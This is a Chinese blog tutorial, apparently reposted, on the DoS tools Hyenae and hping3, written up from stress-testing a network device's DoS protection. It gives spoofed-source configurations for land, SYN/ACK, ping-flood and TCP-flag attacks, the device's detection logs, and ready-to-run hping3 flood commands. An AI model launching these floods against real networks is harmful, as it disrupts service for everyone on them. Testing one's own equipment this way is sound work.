日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

两款实用的DDos攻击工具[通俗易懂](汉典两字的基本解释)

發布時間:2023/12/19 综合教程 28 生活家
生活随笔 收集整理的這篇文章主要介紹了 两款实用的DDos攻击工具[通俗易懂](汉典两字的基本解释) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

兩款實用的DDos攻擊工具

2018-02-22Network?Security865

之前為了重現某個bug,需要對網絡設備進行ddos攻擊測試,同時也是對設備的網絡攻擊防護功能進行抗壓測試。臨陣磨槍,google了兩款攻擊工具,windows平臺的hyenae,以及Linux平臺的hping3,在此記錄一下兩者的用法。

Hyenae

hyenae是在Windows平臺上非常好用的一款ddos攻擊工具,可以完成絕大多數的攻擊操作。

download

  • https://sourceforge.net/projects/hyenae/

Features

  • ARP-Request flooding
  • ARP-Cache poisoning
  • PPPoE session initiation flooding
  • Blind PPPoE session termination
  • ICMP-Echo flooding
  • ICMP-Smurf attack
  • ICMP based TCP-Connection reset
  • TCP-SYN flooding
  • TCP-Land attack
  • Blind TCP-Connection reset
  • UDP flooding
  • DNS-Query flooding
  • DHCP-Discover flooding
  • DHCP starvation attack
  • DHCP-Release forcing
  • Cisco HSRP active router hijacking
  • Pattern based packet address configuration
  • Intelligent address and address protocol detection
  • Smart wildcard-based randomization
  • Daemon for setting up remote attack networks – HyenaeFE QT-Frontend support

interface

hyenae的界面比較簡單,圖中展示的是SYN/ACK洪泛攻擊的配置選項。

  • operation mode中可以選擇網卡
  • NetworkProtocol中可以選擇攻擊方式對應的網絡協議,如SYN洪泛攻擊對應傳輸層的TCPIP協議可選IPv4,IPv6
  • 攻擊源的IP,MAC地址以及端口號可以非常靈活的設置,按MAC-IP@port的格式書寫,如圖中的攻擊源匹配模式%-172.17.14.158@80
    • % 代表任意,在此處代表任意的MAC地址
    • 172.17.14.158為偽造的攻擊源IP,可以修改為任意的合法IP
    • 80為端口號,80同時也是網絡服務器的默認端口
  • 攻擊目標的設置方式與攻擊源一致,圖中的%-172.17.14.10@80
    • % 隨機生成MAC地址
    • 172.17.14.10代表被攻擊的IP
    • 80為攻擊目標的被攻擊端口號
  • 針對TCP協議,右側給出其對應的5個常見flags:FIN,SYN,RST,PSH,ACK
    • 可以隨意進行單選或多選,以實現不同的攻擊方式
    • 隨意的組合可以產生正常通信過程中無法出現的數據包
  • 軟件下方可以設置數據包的發送速率,默認為無限速發送,這會暫用大量帶寬,導致網絡擁塞;當然啦,這個軟件本就是為了攻擊網絡,導致網絡癱瘓正是其目的所在
  • 選擇不同的攻擊方式,會顯示相應不同的配置選項

簡單說,這幅圖的作用是產生MAC地址隨機,IP172.17.14.158,端口為80的偽造源,去攻擊目的MAC隨機,IP172.17.14.10web server

由于目的MAC隨機,當MAC地址首字節為奇數時,生成的數據包為廣播包,此時將產生廣播風暴,局域網內的所有設備都將收到大量的廣播包,當速率很高時,很容易導致局域網癱瘓,這是需要注意的。本人當時年少輕狂,有次測試,使用全速率的廣播式SYN/ACK攻擊,直接導致部門的局域網癱瘓斷網,幸好是晚上,后來找人重置了部門內的網絡設備才恢復,想想真是罪過啊。

Use cases

  • Land Attack
    • src: %-172.17.14.94@53
    • des: %-172.17.14.94@80

  1. DoS *** 3118 *** {Land Attack} are suppressed!
  2. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  3. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  4. [DoS Attack: Land Attack] from source: 172.17.14.94, port 53,
  • SYN/ACK scan (TCP SYN ACK)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80

  1. DoS *** 3896 *** {SYN/ACK Scan} are suppressed!
  2. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: SYN/ACK Scan] from source: 172.17.14.8, port 80,
  • ping flood (icmp echo)
    • src: %-172.17.14.8
    • des: %-172.17.14.94

  1. DoS *** 1881 *** {Ping Flood} are suppressed!
  2. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  3. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  4. [DoS Attack: Ping Flood] from source: 172.17.14.8,
  • ping sweep (icmp echo)
    • src: %-%
    • des: %-%

  1. DoS *** 1719 *** {Ping Sweep} are suppressed!
  2. [DoS Attack: Ping Sweep] from source: 188.167.1.1,
  3. [DoS Attack: Ping Sweep] from source: 113.172.1.5,
  4. [DoS Attack: Ping Sweep] from source: 175.181.2.6,
  • RST Scan(TCP RST)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80

  1. DoS *** 4023 *** {RST Scan} are suppressed!
  2. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: RST Scan] from source: 172.17.14.8, port 80,
  • ACK scan (TCP ACK)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80

  1. DoS *** 3989 *** {ACK Scan} are suppressed!
  2. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: ACK Scan] from source: 172.17.14.8, port 80
  • FIN scan(TCP FIN)
    • src: %-172.17.14.8@80
    • des: %-172.17.14.94@80

  1. DoS *** 3009 *** {FIN Scan} are suppressed!
  2. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,
  3. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,
  4. [DoS Attack: FIN Scan] from source: 172.17.14.8, port 80,

hping3

hping3是用于生成和解析TCPIP協議數據包的開源工具

hping3同樣可用于產生ddos攻擊包,但與hyenae不同的是,hping3無法手動設置MAC地址,而是根據IP地址自動獲取

需要注意的是,如果使用搬瓦工購買的vps向公網IP執行hping3攻擊的話,最好不要嘗試,如果要用也一定記得限速,否則就會被警告并關停,當然你有3次機會重置

examples


  1. # land attack
  2. $ sudo hping3 -V -c 10000 -d 120 -S -w 64 --keep -p 80 -s 20000 --flood -a 172.17.14.52 172.17.14.52
  3. # syn/ack attack
  4. $ sudo hping3 -V -c 10000 -d 120 -S -A -w 64 --keep -p 80 -s 80 --flood -a 172.17.14.192 172.17.14.52
  5. # -V verbose
  6. # -c packet count
  7. # -d data size
  8. # -p destPort
  9. # -s srcPort
  10. # -a srcIP
  11. # -S SYN tag
  12. # -A ACK tag
  13. # -w winsize
  14. # -I interface

reference

  • 網絡攻擊工具
    • hping3
      • http://man.linuxde.net/hping3
      • http://0daysecurity.com/articles/hping3_examples.html
    • LOIC
    • hyenae
      • https://sourceforge.net/projects/hyenae/
    • 免費DDOS攻擊測試工具大合集http://www.freebuf.com/sectool/36545.html
  • ddos攻擊說明
    • https://security.radware.com/ddos-knowledge-center/ddospedia/syn-flood/
    • 網絡攻擊:半連接攻擊(SYN攻擊)、全連接攻擊、RST攻擊、IP欺騙、DNS欺騙、DOS/DDOS攻擊http://blog.csdn.net/guowenyan001/article/details/11777361

轉自:https://www.litreily.top/2018/02/22/ddos-attack/

總結

以上是生活随笔為你收集整理的两款实用的DDos攻击工具[通俗易懂](汉典两字的基本解释)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。